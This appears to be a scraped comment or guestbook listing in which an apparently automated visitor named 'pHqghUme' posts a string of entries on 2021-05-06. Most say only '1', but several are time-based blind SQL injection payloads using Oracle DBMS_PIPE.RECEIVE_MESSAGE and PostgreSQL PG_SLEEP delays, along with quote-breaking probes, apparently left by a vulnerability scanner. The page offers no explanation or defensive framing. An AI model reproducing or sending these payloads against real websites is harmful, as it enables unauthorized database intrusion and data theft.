 • pHqghUme

  2021-05-06 09:41:54


  1


 • pHqghUme

  2021-05-06 09:41:38


  1


 • pHqghUme

  2021-05-06 09:41:28


  1yeAsNLNO


 • 1gkhaBLAO

  2021-05-06 09:41:27


  1


 • pHqghUme

  2021-05-06 09:41:26


  1


 • pHqghUme

  2021-05-06 09:41:25


  1


 • pHqghUme

  2021-05-06 09:06:27


  1


 • pHqghUme

  2021-05-06 02:03:31


  @@vxKY6


 • pHqghUme

  2021-05-06 02:03:28


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 02:03:28


  1'"


 • pHqghUme

  2021-05-06 02:03:07


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 02:02:44


  q5EaVxH4')) OR 858=(SELECT 858 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 02:02:22


  ONqvnC4k') OR 908=(SELECT 908 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 02:02:05


  QMEH7poC' OR 665=(SELECT 665 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 02:01:44


  -1)) OR 593=(SELECT 593 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 02:01:23


  -5) OR 832=(SELECT 832 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 02:01:05


  -5 OR 251=(SELECT 251 FROM PG_SLEEP(15))--